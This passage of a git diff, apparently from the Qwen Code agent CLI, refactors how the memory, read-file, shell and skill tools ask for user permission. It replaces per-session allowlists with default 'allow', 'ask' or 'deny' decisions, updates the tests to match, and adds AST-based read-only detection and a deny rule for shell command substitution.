@typescript-eslint/no-explicit-any - (invocation.constructor as any).allowlist.clear(); }); - it('should return confirmation details when memory file is not allowlisted for global scope', async () => { + it('should always return ask from getDefaultPermission', async () => { const params = { fact: 'Test fact', scope: 'global' as const }; const invocation = memoryTool.build(params); - const result = await invocation.shouldConfirmExecute(mockAbortSignal); + const permission = await invocation.getDefaultPermission(); + + expect(permission).toBe('ask'); + }); + + it('should return confirmation details for global scope', async () => { + const params = { fact: 'Test fact', scope: 'global' as const }; + const invocation = memoryTool.build(params); + const permission = await invocation.getDefaultPermission(); + expect(permission).toBe('ask'); + + const result = await invocation.getConfirmationDetails(mockAbortSignal); expect(result).toBeDefined(); - expect(result).not.toBe(false); - if (result && result.type === 'edit') { + if (result.type === 'edit') { const expectedPath = path.join('~', '.qwen', 'QWEN.md'); expect(result.title).toBe( `Confirm Memory Save: ${expectedPath} (global)`, @@ -353,15 +358,17 @@ describe('MemoryTool', () => { } }); - it('should return confirmation details when memory file is not allowlisted for project scope', async () => { + it('should return confirmation details for project scope', async () => { const params = { fact: 'Test fact', scope: 'project' as const }; const invocation = memoryTool.build(params); - const result = await invocation.shouldConfirmExecute(mockAbortSignal); + const permission = await invocation.getDefaultPermission(); + expect(permission).toBe('ask'); + + const result = await invocation.getConfirmationDetails(mockAbortSignal); expect(result).toBeDefined(); - expect(result).not.toBe(false); - if (result && result.type === 'edit') { + if (result.type === 'edit') { const expectedPath = path.join(process.cwd(), 'QWEN.md'); 
expect(result.title).toBe( `Confirm Memory Save: ${expectedPath} (project)`, @@ -376,121 +383,22 @@ describe('MemoryTool', () => { } }); - it('should return false when memory file is already allowlisted for global scope', async () => { + it('should have no-op onConfirm callback', async () => { const params = { fact: 'Test fact', scope: 'global' as const }; - const memoryFilePath = path.join( - os.homedir(), - '.qwen', - getCurrentGeminiMdFilename(), - ); - const invocation = memoryTool.build(params); - // Add the memory file to the allowlist with the scope-specific key format - // eslint-disable-next-line @typescript-eslint/no-explicit-any - (invocation.constructor as any).allowlist.add(`${memoryFilePath}_global`); + const result = await invocation.getConfirmationDetails(mockAbortSignal); - const result = await invocation.shouldConfirmExecute(mockAbortSignal); - - expect(result).toBe(false); - }); - - it('should return false when memory file is already allowlisted for project scope', async () => { - const params = { fact: 'Test fact', scope: 'project' as const }; - const memoryFilePath = path.join( - process.cwd(), - getCurrentGeminiMdFilename(), - ); - - const invocation = memoryTool.build(params); - // Add the memory file to the allowlist with the scope-specific key format - // eslint-disable-next-line @typescript-eslint/no-explicit-any - (invocation.constructor as any).allowlist.add( - `${memoryFilePath}_project`, - ); - - const result = await invocation.shouldConfirmExecute(mockAbortSignal); - - expect(result).toBe(false); - }); - - it('should add memory file to allowlist when ProceedAlways is confirmed for global scope', async () => { - const params = { fact: 'Test fact', scope: 'global' as const }; - const memoryFilePath = path.join( - os.homedir(), - '.qwen', - getCurrentGeminiMdFilename(), - ); - - const invocation = memoryTool.build(params); - const result = await invocation.shouldConfirmExecute(mockAbortSignal); - - expect(result).toBeDefined(); - 
expect(result).not.toBe(false); - - if (result && result.type === 'edit') { - // Simulate the onConfirm callback - await result.onConfirm(ToolConfirmationOutcome.ProceedAlways); - - // Check that the memory file was added to the allowlist with the scope-specific key format - expect( - // eslint-disable-next-line @typescript-eslint/no-explicit-any - (invocation.constructor as any).allowlist.has( - `${memoryFilePath}_global`, - ), - ).toBe(true); - } - }); - - it('should add memory file to allowlist when ProceedAlways is confirmed for project scope', async () => { - const params = { fact: 'Test fact', scope: 'project' as const }; - const memoryFilePath = path.join( - process.cwd(), - getCurrentGeminiMdFilename(), - ); - - const invocation = memoryTool.build(params); - const result = await invocation.shouldConfirmExecute(mockAbortSignal); - - expect(result).toBeDefined(); - expect(result).not.toBe(false); - - if (result && result.type === 'edit') { - // Simulate the onConfirm callback - await result.onConfirm(ToolConfirmationOutcome.ProceedAlways); - - // Check that the memory file was added to the allowlist with the scope-specific key format - expect( - // eslint-disable-next-line @typescript-eslint/no-explicit-any - (invocation.constructor as any).allowlist.has( - `${memoryFilePath}_project`, - ), - ).toBe(true); - } - }); - - it('should not add memory file to allowlist when other outcomes are confirmed', async () => { - const params = { fact: 'Test fact', scope: 'global' as const }; - const memoryFilePath = path.join( - os.homedir(), - '.qwen', - getCurrentGeminiMdFilename(), - ); - - const invocation = memoryTool.build(params); - const result = await invocation.shouldConfirmExecute(mockAbortSignal); - - expect(result).toBeDefined(); - expect(result).not.toBe(false); - - if (result && result.type === 'edit') { - // Simulate the onConfirm callback with different outcomes - await result.onConfirm(ToolConfirmationOutcome.ProceedOnce); - // eslint-disable-next-line 
@typescript-eslint/no-explicit-any - const allowlist = (invocation.constructor as any).allowlist; - expect(allowlist.has(`${memoryFilePath}_global`)).toBe(false); - - await result.onConfirm(ToolConfirmationOutcome.Cancel); - expect(allowlist.has(`${memoryFilePath}_global`)).toBe(false); + if (result.type === 'edit') { + // onConfirm should be a no-op — just verify it doesn't throw + await expect( + result.onConfirm(ToolConfirmationOutcome.ProceedAlways), + ).resolves.toBeUndefined(); + await expect( + result.onConfirm(ToolConfirmationOutcome.ProceedOnce), + ).resolves.toBeUndefined(); + await expect( + result.onConfirm(ToolConfirmationOutcome.Cancel), + ).resolves.toBeUndefined(); } }); @@ -503,12 +411,14 @@ describe('MemoryTool', () => { vi.mocked(fs.readFile).mockResolvedValue(existingContent); const invocation = memoryTool.build(params); - const result = await invocation.shouldConfirmExecute(mockAbortSignal); + const permission = await invocation.getDefaultPermission(); + expect(permission).toBe('ask'); + + const result = await invocation.getConfirmationDetails(mockAbortSignal); expect(result).toBeDefined(); - expect(result).not.toBe(false); - if (result && result.type === 'edit') { + if (result.type === 'edit') { const expectedPath = path.join('~', '.qwen', 'QWEN.md'); expect(result.title).toBe( `Confirm Memory Save: ${expectedPath} (global)`, @@ -524,12 +434,14 @@ describe('MemoryTool', () => { it('should prompt for scope selection when scope is not specified', async () => { const params = { fact: 'Test fact' }; const invocation = memoryTool.build(params); - const result = await invocation.shouldConfirmExecute(mockAbortSignal); + const permission = await invocation.getDefaultPermission(); + expect(permission).toBe('ask'); + + const result = await invocation.getConfirmationDetails(mockAbortSignal); expect(result).toBeDefined(); - expect(result).not.toBe(false); - if (result && result.type === 'edit') { + if (result.type === 'edit') { 
expect(result.title).toContain('Choose Memory Location'); expect(result.title).toContain('GLOBAL'); expect(result.title).toContain('PROJECT'); @@ -546,12 +458,11 @@ describe('MemoryTool', () => { it('should show correct file paths in scope selection prompt', async () => { const params = { fact: 'Test fact' }; const invocation = memoryTool.build(params); - const result = await invocation.shouldConfirmExecute(mockAbortSignal); + const result = await invocation.getConfirmationDetails(mockAbortSignal); expect(result).toBeDefined(); - expect(result).not.toBe(false); - if (result && result.type === 'edit') { + if (result.type === 'edit') { const globalPath = path.join('~', '.qwen', 'QWEN.md'); const projectPath = path.join(process.cwd(), 'QWEN.md'); diff --git a/packages/core/src/tools/memoryTool.ts b/packages/core/src/tools/memoryTool.ts index 95c89b18b..655449068 100644 --- a/packages/core/src/tools/memoryTool.ts +++ b/packages/core/src/tools/memoryTool.ts @@ -4,13 +4,14 @@ * SPDX-License-Identifier: Apache-2.0 */ -import type { ToolEditConfirmationDetails, ToolResult } from './tools.js'; -import { - BaseDeclarativeTool, - BaseToolInvocation, - Kind, +import type { + ToolEditConfirmationDetails, + ToolResult, + ToolCallConfirmationDetails, ToolConfirmationOutcome, } from './tools.js'; +import type { PermissionDecision } from '../permissions/types.js'; +import { BaseDeclarativeTool, BaseToolInvocation, Kind } from './tools.js'; import type { FunctionDeclaration } from '@google/genai'; import * as fs from 'node:fs/promises'; import * as path from 'node:path'; @@ -207,8 +208,6 @@ class MemoryToolInvocation extends BaseToolInvocation< SaveMemoryParams, ToolResult > { - private static readonly allowlist: Set = new Set(); - getDescription(): string { if (!this.params.scope) { const globalPath = tildeifyPath(getMemoryFilePath('global')); @@ -220,12 +219,21 @@ class MemoryToolInvocation extends BaseToolInvocation< return `${tildeifyPath(memoryFilePath)} (${scope})`; } - 
override async shouldConfirmExecute( + /** + * Memory save always needs user confirmation. + */ + override async getDefaultPermission(): Promise { + return 'ask'; + } + + /** + * Constructs the memory save confirmation dialog. + */ + override async getConfirmationDetails( _abortSignal: AbortSignal, - ): Promise { + ): Promise { // When scope is not specified, show a choice dialog defaulting to global if (!this.params.scope) { - // Show preview of what would be added to global by default const defaultScope = 'global'; const currentContent = await readMemoryFileContent(defaultScope); const newContent = computeNewContent(currentContent, this.params.fact); @@ -270,14 +278,9 @@ Preview of changes to be made to GLOBAL memory: return confirmationDetails; } - // Only check allowlist when scope is specified + // Scope is specified const scope = this.params.scope; const memoryFilePath = getMemoryFilePath(scope); - const allowlistKey = `${memoryFilePath}_${scope}`; - - if (MemoryToolInvocation.allowlist.has(allowlistKey)) { - return false; - } // Read current content of the memory file const currentContent = await readMemoryFileContent(scope); @@ -303,10 +306,8 @@ Preview of changes to be made to GLOBAL memory: fileDiff, originalContent: currentContent, newContent, - onConfirm: async (outcome: ToolConfirmationOutcome) => { - if (outcome === ToolConfirmationOutcome.ProceedAlways) { - MemoryToolInvocation.allowlist.add(allowlistKey); - } + onConfirm: async (_outcome: ToolConfirmationOutcome) => { + // No-op: persistence is handled by coreToolScheduler via PM rules }, }; return confirmationDetails; diff --git a/packages/core/src/tools/read-file.test.ts b/packages/core/src/tools/read-file.test.ts index ec07a6995..64a46fe9e 100644 --- a/packages/core/src/tools/read-file.test.ts +++ b/packages/core/src/tools/read-file.test.ts @@ -40,10 +40,13 @@ describe('ReadFileTool', () => { getWorkspaceContext: () => createMockWorkspaceContext(tempRootDir), storage: { getProjectTempDir: () => 
path.join(tempRootDir, '.temp'), - getUserSkillsDir: () => path.join(os.homedir(), '.qwen', 'skills'), + getUserSkillsDirs: () => [path.join(os.homedir(), '.qwen', 'skills')], }, getTruncateToolOutputThreshold: () => 2500, getTruncateToolOutputLines: () => 500, + getContentGeneratorConfig: () => ({ + modalities: { image: true, pdf: true, audio: true, video: true }, + }), } as unknown as Config; tool = new ReadFileTool(mockConfigInstance); }); @@ -73,13 +76,12 @@ describe('ReadFileTool', () => { ); }); - it('should throw error if path is outside root', () => { + it('should allow path outside root (external path support)', () => { const params: ReadFileToolParams = { absolute_path: '/outside/root.txt', }; - expect(() => tool.build(params)).toThrow( - /File path must be within one of the workspace directories/, - ); + const invocation = tool.build(params); + expect(invocation).toBeDefined(); }); it('should allow access to files in project temp directory', () => { @@ -91,13 +93,20 @@ describe('ReadFileTool', () => { expect(typeof result).not.toBe('string'); }); - it('should show temp directory in error message when path is outside workspace and temp dir', () => { + it('should allow access to files in OS temp directory', () => { + const params: ReadFileToolParams = { + absolute_path: path.join(os.tmpdir(), 'pr-review-context.md'), + }; + const result = tool.build(params); + expect(typeof result).not.toBe('string'); + }); + + it('should allow path completely outside workspace (external path support)', () => { const params: ReadFileToolParams = { absolute_path: '/completely/outside/path.txt', }; - expect(() => tool.build(params)).toThrow( - /File path must be within one of the workspace directories.*or within the project temp directory/, - ); + const invocation = tool.build(params); + expect(invocation).toBeDefined(); }); it('should throw error if path is empty', () => { @@ -130,6 +139,36 @@ describe('ReadFileTool', () => { }); }); + describe('getDefaultPermission', () => 
{ + it('should return allow for paths within workspace', async () => { + const params: ReadFileToolParams = { + absolute_path: path.join(tempRootDir, 'test.txt'), + }; + const invocation = tool.build(params); + const permission = await invocation.getDefaultPermission(); + expect(permission).toBe('allow'); + }); + + it('should return ask for paths outside workspace', async () => { + const params: ReadFileToolParams = { + absolute_path: '/outside/workspace/file.txt', + }; + const invocation = tool.build(params); + const permission = await invocation.getDefaultPermission(); + expect(permission).toBe('ask'); + }); + + it('should return allow for paths within temp directory', async () => { + const tempDir = path.join(tempRootDir, '.temp'); + const params: ReadFileToolParams = { + absolute_path: path.join(tempDir, 'temp-file.txt'), + }; + const invocation = tool.build(params); + const permission = await invocation.getDefaultPermission(); + expect(permission).toBe('allow'); + }); + }); + describe('getDescription', () => { it('should return relative path without limit/offset', () => { const subDir = path.join(tempRootDir, 'sub', 'dir'); @@ -424,6 +463,28 @@ describe('ReadFileTool', () => { expect(result.returnDisplay).toBe(''); }); + it('should successfully read files from OS temp directory', async () => { + const osTempFile = await fsp.mkdtemp( + path.join(os.tmpdir(), 'read-file-test-'), + ); + const tempFilePath = path.join(osTempFile, 'pr-review-context.md'); + const tempFileContent = '## PR #123\nFix encoding issues'; + await fsp.writeFile(tempFilePath, tempFileContent, 'utf-8'); + + try { + const params: ReadFileToolParams = { absolute_path: tempFilePath }; + const invocation = tool.build(params) as ToolInvocation< + ReadFileToolParams, + ToolResult + >; + + const result = await invocation.execute(abortSignal); + expect(result.llmContent).toBe(tempFileContent); + } finally { + await fsp.rm(osTempFile, { recursive: true, force: true }); + } + }); + describe('with 
.qwenignore', () => { beforeEach(async () => { await fsp.writeFile( diff --git a/packages/core/src/tools/read-file.ts b/packages/core/src/tools/read-file.ts index e09a1ac58..832e11e0a 100644 --- a/packages/core/src/tools/read-file.ts +++ b/packages/core/src/tools/read-file.ts @@ -4,6 +4,7 @@ * SPDX-License-Identifier: Apache-2.0 */ +import os from 'node:os'; import path from 'node:path'; import { makeRelative, shortenPath } from '../utils/paths.js'; import type { ToolInvocation, ToolLocation, ToolResult } from './tools.js'; @@ -11,6 +12,7 @@ import { BaseDeclarativeTool, BaseToolInvocation, Kind } from './tools.js'; import { ToolNames, ToolDisplayNames } from './tool-names.js'; import type { PartUnion } from '@google/genai'; +import type { PermissionDecision } from '../permissions/types.js'; import { processSingleFileContent, getSpecificMimeType, @@ -20,7 +22,7 @@ import { FileOperation } from '../telemetry/metrics.js'; import { getProgrammingLanguage } from '../telemetry/telemetry-utils.js'; import { logFileOperation } from '../telemetry/loggers.js'; import { FileOperationEvent } from '../telemetry/types.js'; -import { isSubpath } from '../utils/paths.js'; +import { isSubpaths, isSubpath } from '../utils/paths.js'; import { Storage } from '../config/storage.js'; /** @@ -77,6 +79,32 @@ class ReadFileToolInvocation extends BaseToolInvocation< return [{ path: this.params.absolute_path, line: this.params.offset }]; } + /** + * Returns 'ask' for paths outside the workspace/temp/userSkills directories, + * so that external file reads require user confirmation. 
+ */ + override async getDefaultPermission(): Promise { + const filePath = path.resolve(this.params.absolute_path); + const workspaceContext = this.config.getWorkspaceContext(); + const globalTempDir = Storage.getGlobalTempDir(); + const projectTempDir = this.config.storage.getProjectTempDir(); + const userSkillsDirs = this.config.storage.getUserSkillsDirs(); + const userExtensionsDir = Storage.getUserExtensionsDir(); + const osTempDir = os.tmpdir(); + + if ( + workspaceContext.isPathWithinWorkspace(filePath) || + isSubpath(projectTempDir, filePath) || + isSubpath(globalTempDir, filePath) || + isSubpath(osTempDir, filePath) || + isSubpaths(userSkillsDirs, filePath) || + isSubpath(userExtensionsDir, filePath) + ) { + return 'allow'; + } + return 'ask'; + } + async execute(): Promise { const result = await processSingleFileContent( this.params.absolute_path, @@ -183,26 +211,6 @@ export class ReadFileTool extends BaseDeclarativeTool< return `File path must be absolute, but was relative: ${filePath}. 
You must provide an absolute path.`; } - const workspaceContext = this.config.getWorkspaceContext(); - const globalTempDir = Storage.getGlobalTempDir(); - const projectTempDir = this.config.storage.getProjectTempDir(); - const userSkillsDir = this.config.storage.getUserSkillsDir(); - const resolvedFilePath = path.resolve(filePath); - const isWithinTempDir = - isSubpath(projectTempDir, resolvedFilePath) || - isSubpath(globalTempDir, resolvedFilePath); - const isWithinUserSkills = isSubpath(userSkillsDir, resolvedFilePath); - - if ( - !workspaceContext.isPathWithinWorkspace(filePath) && - !isWithinTempDir && - !isWithinUserSkills - ) { - const directories = workspaceContext.getDirectories(); - return `File path must be within one of the workspace directories: ${directories.join( - ', ', - )} or within the project temp directory: ${projectTempDir}`; - } if (params.offset !== undefined && params.offset < 0) { return 'Offset must be a non-negative number'; } diff --git a/packages/core/src/tools/shell.test.ts b/packages/core/src/tools/shell.test.ts index d03509451..693b03ec1 100644 --- a/packages/core/src/tools/shell.test.ts +++ b/packages/core/src/tools/shell.test.ts @@ -21,7 +21,6 @@ vi.mock('../services/shellExecutionService.js', () => ({ vi.mock('fs'); vi.mock('os'); vi.mock('crypto'); -vi.mock('../utils/summarizer.js'); import { isCommandAllowed } from '../utils/shell-utils.js'; import { ShellTool } from './shell.js'; @@ -35,9 +34,7 @@ import * as os from 'node:os'; import { EOL } from 'node:os'; import * as path from 'node:path'; import * as crypto from 'node:crypto'; -import * as summarizer from '../utils/summarizer.js'; import { ToolErrorType } from './tool-error.js'; -import { ToolConfirmationOutcome } from './tools.js'; import { OUTPUT_UPDATE_INTERVAL_MS } from './shell.js'; import { createMockWorkspaceContext } from '../test-utils/mockWorkspaceContext.js'; @@ -52,16 +49,18 @@ describe('ShellTool', () => { mockConfig = { getCoreTools: 
vi.fn().mockReturnValue([]), - getExcludeTools: vi.fn().mockReturnValue([]), + getPermissionsDeny: vi.fn().mockReturnValue([]), getDebugMode: vi.fn().mockReturnValue(false), getTargetDir: vi.fn().mockReturnValue('/test/dir'), - getSummarizeToolOutputConfig: vi.fn().mockReturnValue(undefined), getWorkspaceContext: vi .fn() .mockReturnValue(createMockWorkspaceContext('/test/dir')), storage: { - getUserSkillsDir: vi.fn().mockReturnValue('/test/dir/.qwen/skills'), + getUserSkillsDirs: vi.fn().mockReturnValue(['/test/dir/.qwen/skills']), + getProjectTempDir: vi.fn().mockReturnValue('/tmp/qwen-temp'), }, + getTruncateToolOutputThreshold: vi.fn().mockReturnValue(0), + getTruncateToolOutputLines: vi.fn().mockReturnValue(0), getGeminiClient: vi.fn(), getGitCoAuthor: vi.fn().mockReturnValue({ enabled: true, @@ -94,7 +93,7 @@ describe('ShellTool', () => { describe('isCommandAllowed', () => { it('should allow a command if no restrictions are provided', () => { (mockConfig.getCoreTools as Mock).mockReturnValue(undefined); - (mockConfig.getExcludeTools as Mock).mockReturnValue(undefined); + (mockConfig.getPermissionsDeny as Mock).mockReturnValue(undefined); expect(isCommandAllowed('ls -l', mockConfig).allowed).toBe(true); }); @@ -476,42 +475,6 @@ describe('ShellTool', () => { ).toThrow('Directory must be an absolute path.'); }); - it('should summarize output when configured', async () => { - (mockConfig.getSummarizeToolOutputConfig as Mock).mockReturnValue({ - [shellTool.name]: { tokenBudget: 1000 }, - }); - vi.mocked(summarizer.summarizeToolOutput).mockResolvedValue( - 'summarized output', - ); - - const invocation = shellTool.build({ - command: 'ls', - is_background: false, - }); - const promise = invocation.execute(mockAbortSignal); - resolveExecutionPromise({ - output: 'long output', - rawOutput: Buffer.from('long output'), - exitCode: 0, - signal: null, - error: null, - aborted: false, - pid: 12345, - executionMethod: 'child_process', - }); - - const result = await promise; 
- - expect(summarizer.summarizeToolOutput).toHaveBeenCalledWith( - expect.any(String), - mockConfig.getGeminiClient(), - expect.any(AbortSignal), - 1000, - ); - expect(result.llmContent).toBe('summarized output'); - expect(result.returnDisplay).toBe('long output'); - }); - it('should clean up the temp file on synchronous execution error', async () => { const error = new Error('sync spawn error'); mockShellExecutionService.mockImplementation(() => { @@ -933,44 +896,57 @@ describe('ShellTool', () => { }); }); - describe('shouldConfirmExecute', () => { + describe('getDefaultPermission and getConfirmationDetails', () => { it('should not request confirmation for read-only commands', async () => { const invocation = shellTool.build({ command: 'ls -la', is_background: false, }); - const confirmation = await invocation.shouldConfirmExecute( - new AbortController().signal, - ); + const permission = await invocation.getDefaultPermission(); - expect(confirmation).toBe(false); + expect(permission).toBe('allow'); }); - it('should request confirmation for a new command and whitelist it on "Always"', async () => { + it('should request confirmation for a non-read-only command and return details', async () => { const params = { command: 'npm install', is_background: false }; const invocation = shellTool.build(params); - const confirmation = await invocation.shouldConfirmExecute( + + const permission = await invocation.getDefaultPermission(); + expect(permission).toBe('ask'); + + const details = await invocation.getConfirmationDetails( new AbortController().signal, ); + expect(details.type).toBe('exec'); + }); - expect(confirmation).not.toBe(false); - expect(confirmation && confirmation.type).toBe('exec'); - - // eslint-disable-next-line @typescript-eslint/no-explicit-any - await (confirmation as any).onConfirm( - ToolConfirmationOutcome.ProceedAlways, - ); - - // Should now be whitelisted - const secondInvocation = shellTool.build({ - command: 'npm test', + it('should exclude 
read-only sub-commands from confirmation details in compound commands', async () => { + // "cd" is read-only, "npm run build" is not + const params = { + command: 'cd packages/core && npm run build', is_background: false, - }); - const secondConfirmation = await secondInvocation.shouldConfirmExecute( + }; + const invocation = shellTool.build(params); + + const permission = await invocation.getDefaultPermission(); + expect(permission).toBe('ask'); + + const details = (await invocation.getConfirmationDetails( new AbortController().signal, + )) as { rootCommand: string; permissionRules: string[] }; + + // rootCommand should only include 'npm', not 'cd' + expect(details.rootCommand).not.toContain('cd'); + expect(details.rootCommand).toContain('npm'); + + // permissionRules should not include Bash(cd *) + expect(details.permissionRules).not.toContainEqual( + expect.stringContaining('cd'), + ); + expect(details.permissionRules).toContainEqual( + expect.stringContaining('npm'), ); - expect(secondConfirmation).toBe(false); }); it('should throw an error if validation fails', () => { diff --git a/packages/core/src/tools/shell.ts b/packages/core/src/tools/shell.ts index 01a9ac5cf..3d38eaf4b 100644 --- a/packages/core/src/tools/shell.ts +++ b/packages/core/src/tools/shell.ts @@ -18,15 +18,12 @@ import type { ToolCallConfirmationDetails, ToolExecuteConfirmationDetails, ToolConfirmationPayload, -} from './tools.js'; -import { - BaseDeclarativeTool, - BaseToolInvocation, ToolConfirmationOutcome, - Kind, } from './tools.js'; +import type { PermissionDecision } from '../permissions/types.js'; +import { BaseDeclarativeTool, BaseToolInvocation, Kind } from './tools.js'; import { getErrorMessage } from '../utils/errors.js'; -import { summarizeToolOutput } from '../utils/summarizer.js'; +import { truncateToolOutput } from '../utils/truncation.js'; import type { ShellExecutionConfig, ShellOutputEvent, @@ -34,14 +31,19 @@ import type { import { ShellExecutionService } from 
'../services/shellExecutionService.js'; import { formatMemoryUsage } from '../utils/formatters.js'; import type { AnsiOutput } from '../utils/terminalSerializer.js'; -import { isSubpath } from '../utils/paths.js'; +import { isSubpaths } from '../utils/paths.js'; import { + getCommandRoot, getCommandRoots, - isCommandAllowed, - isCommandNeedsPermission, + splitCommands, stripShellWrapper, + detectCommandSubstitution, } from '../utils/shell-utils.js'; import { createDebugLogger } from '../utils/debugLogger.js'; +import { + isShellCommandReadOnlyAST, + extractCommandRules, +} from '../utils/shellAstParser.js'; const debugLogger = createDebugLogger('SHELL'); @@ -63,7 +65,6 @@ export class ShellToolInvocation extends BaseToolInvocation< constructor( private readonly config: Config, params: ShellToolParams, - private readonly allowlist: Set, ) { super(params); } @@ -89,36 +90,96 @@ export class ShellToolInvocation extends BaseToolInvocation< return description; } - override async shouldConfirmExecute( - _abortSignal: AbortSignal, - ): Promise { + /** + * AST-based permission check for the shell command. 
+ * - Command substitution → 'deny' (security) + * - Read-only commands (via AST analysis) → 'allow' + * - All other commands → 'ask' + */ + override async getDefaultPermission(): Promise { const command = stripShellWrapper(this.params.command); - const rootCommands = [...new Set(getCommandRoots(command))]; - const commandsToConfirm = rootCommands.filter( - (command) => !this.allowlist.has(command), - ); - if (commandsToConfirm.length === 0) { - return false; // already approved and allowlisted + // Security: command substitution ($(), ``, <(), >()) → deny + if (detectCommandSubstitution(command)) { + return 'deny'; } - const permissionCheck = isCommandNeedsPermission(command); - if (!permissionCheck.requiresPermission) { - return false; + // AST-based read-only detection + try { + const isReadOnly = await isShellCommandReadOnlyAST(command); + if (isReadOnly) { + return 'allow'; + } + } catch (e) { + debugLogger.warn('AST read-only check failed, falling back to ask:', e); + } + + return 'ask'; + } + + /** + * Constructs confirmation dialog details for a shell command that needs + * user approval. For compound commands (e.g. `cd foo && npm run build`), + * sub-commands that are already allowed (read-only) are excluded from both + * the displayed root-command list and the suggested permission rules. 
+ */ + override async getConfirmationDetails( + _abortSignal: AbortSignal, + ): Promise { + const command = stripShellWrapper(this.params.command); + + // Split compound command and filter out already-allowed (read-only) sub-commands + const subCommands = splitCommands(command); + const nonReadOnlySubCommands: string[] = []; + for (const sub of subCommands) { + try { + const isReadOnly = await isShellCommandReadOnlyAST(sub); + if (!isReadOnly) { + nonReadOnlySubCommands.push(sub); + } + } catch { + nonReadOnlySubCommands.push(sub); // conservative: include if check fails + } + } + + // Fallback to all sub-commands if everything was filtered out (shouldn't + // normally happen since getDefaultPermission already returned 'ask'). + const effectiveSubCommands = + nonReadOnlySubCommands.length > 0 ? nonReadOnlySubCommands : subCommands; + + const rootCommands = [ + ...new Set( + effectiveSubCommands + .map((c) => getCommandRoot(c)) + .filter((c): c is string => !!c), + ), + ]; + + // Extract minimum-scope permission rules only for sub-commands that + // actually need confirmation. 
+ let permissionRules: string[] = []; + try { + const allRules: string[] = []; + for (const sub of effectiveSubCommands) { + const rules = await extractCommandRules(sub); + allRules.push(...rules); + } + permissionRules = [...new Set(allRules)].map((rule) => `Bash(${rule})`); + } catch (e) { + debugLogger.warn('Failed to extract command rules:', e); } const confirmationDetails: ToolExecuteConfirmationDetails = { type: 'exec', title: 'Confirm Shell Command', command: this.params.command, - rootCommand: commandsToConfirm.join(', '), + rootCommand: rootCommands.join(', '), + permissionRules, onConfirm: async ( - outcome: ToolConfirmationOutcome, + _outcome: ToolConfirmationOutcome, _payload?: ToolConfirmationPayload, ) => { - if (outcome === ToolConfirmationOutcome.ProceedAlways) { - commandsToConfirm.forEach((command) => this.allowlist.add(command)); - } + // No-op: persistence is handled by coreToolScheduler via PM rules }, }; return confirmationDetails; @@ -378,7 +439,22 @@ export class ShellToolInvocation extends BaseToolInvocation< } } - const summarizeConfig = this.config.getSummarizeToolOutputConfig(); + // Truncate large output and save full content to a temp file. + if (typeof llmContent === 'string') { + const truncatedResult = await truncateToolOutput( + this.config, + ShellTool.Name, + llmContent, + ); + + if (truncatedResult.outputFile) { + llmContent = truncatedResult.content; + returnDisplayMessage += + (returnDisplayMessage ? '\n' : '') + + `Output too long and was saved to: ${truncatedResult.outputFile}`; + } + } + const executionError = result.error ? 
{ error: { @@ -388,20 +464,6 @@ export class ShellToolInvocation extends BaseToolInvocation< } : {}; - if (summarizeConfig && summarizeConfig[ShellTool.Name]) { - const summary = await summarizeToolOutput( - llmContent, - this.config.getGeminiClient(), - signal, - summarizeConfig[ShellTool.Name].tokenBudget, - ); - return { - llmContent: summary, - returnDisplay: returnDisplayMessage, - ...executionError, - }; - } - return { llmContent, returnDisplay: returnDisplayMessage, @@ -541,7 +603,6 @@ export class ShellTool extends BaseDeclarativeTool< ToolResult > { static Name: string = ToolNames.SHELL; - private allowlist: Set = new Set(); constructor(private readonly config: Config) { super( @@ -586,16 +647,9 @@ export class ShellTool extends BaseDeclarativeTool< protected override validateToolParamValues( params: ShellToolParams, ): string | null { - const commandCheck = isCommandAllowed(params.command, this.config); - if (!commandCheck.allowed) { - if (!commandCheck.reason) { - debugLogger.error( - 'Unexpected: isCommandAllowed returned false without a reason', - ); - return `Command is not allowed: ${params.command}`; - } - return commandCheck.reason; - } + // NOTE: Permission checks (command substitution, read-only detection, PM rules) + // are now handled at L3 (getDefaultPermission) and L4 (PM override) in + // coreToolScheduler. This method only performs pure parameter validation. 
if (!params.command.trim()) { return 'Command cannot be empty.'; } @@ -621,10 +675,10 @@ export class ShellTool extends BaseDeclarativeTool< return 'Directory must be an absolute path.'; } - const userSkillsDir = this.config.storage.getUserSkillsDir(); + const userSkillsDirs = this.config.storage.getUserSkillsDirs(); const resolvedDirectoryPath = path.resolve(params.directory); - const isWithinUserSkills = isSubpath( - userSkillsDir, + const isWithinUserSkills = isSubpaths( + userSkillsDirs, resolvedDirectoryPath, ); if (isWithinUserSkills) { @@ -646,6 +700,6 @@ export class ShellTool extends BaseDeclarativeTool< protected createInvocation( params: ShellToolParams, ): ToolInvocation { - return new ShellToolInvocation(this.config, params, this.allowlist); + return new ShellToolInvocation(this.config, params); } } diff --git a/packages/core/src/tools/skill.test.ts b/packages/core/src/tools/skill.test.ts index 7f327be73..b25e872d0 100644 --- a/packages/core/src/tools/skill.test.ts +++ b/packages/core/src/tools/skill.test.ts @@ -24,7 +24,6 @@ type SkillToolWithProtectedMethods = SkillTool & { returnDisplay: ToolResultDisplay; }>; getDescription: () => string; - shouldConfirmExecute: () => Promise; }; }; @@ -393,9 +392,9 @@ describe('SkillTool', () => { const invocation = ( skillTool as SkillToolWithProtectedMethods ).createInvocation(params); - const shouldConfirm = await invocation.shouldConfirmExecute(); + const permission = await invocation.getDefaultPermission(); - expect(shouldConfirm).toBe(false); + expect(permission).toBe('allow'); }); it('should provide correct description', () => { diff --git a/packages/core/src/tools/skill.ts b/packages/core/src/tools/skill.ts index 68ec7dd55..f64f109de 100644 --- a/packages/core/src/tools/skill.ts +++ b/packages/core/src/tools/skill.ts @@ -20,6 +20,15 @@ export interface SkillParams { skill: string; } +/** + * Builds the LLM-facing content string when a skill body is injected. 
+ * Shared between SkillToolInvocation (runtime) and /context (estimation) + * so that token estimates stay in sync with actual usage. + */ +export function buildSkillLlmContent(baseDir: string, body: string): string { + return `Base directory for this skill: ${baseDir}\nImportant: ALWAYS resolve absolute paths from this base directory when working with skills.\n\n${body}\n`; +} + /** * Skill tool that enables the model to access skill definitions. * The tool dynamically loads available skills and includes them in its description @@ -30,6 +39,7 @@ export class SkillTool extends BaseDeclarativeTool { private skillManager: SkillManager; private availableSkills: SkillConfig[] = []; + private loadedSkillNames: Set = new Set(); constructor(private readonly config: Config) { // Initialize with a basic schema first @@ -176,12 +186,34 @@ ${skillDescriptions} } protected createInvocation(params: SkillParams) { - return new SkillToolInvocation(this.config, this.skillManager, params); + return new SkillToolInvocation( + this.config, + this.skillManager, + params, + (name: string) => this.loadedSkillNames.add(name), + ); } getAvailableSkillNames(): string[] { return this.availableSkills.map((skill) => skill.name); } + + /** + * Returns the set of skill names that have been successfully loaded + * (invoked) during the current 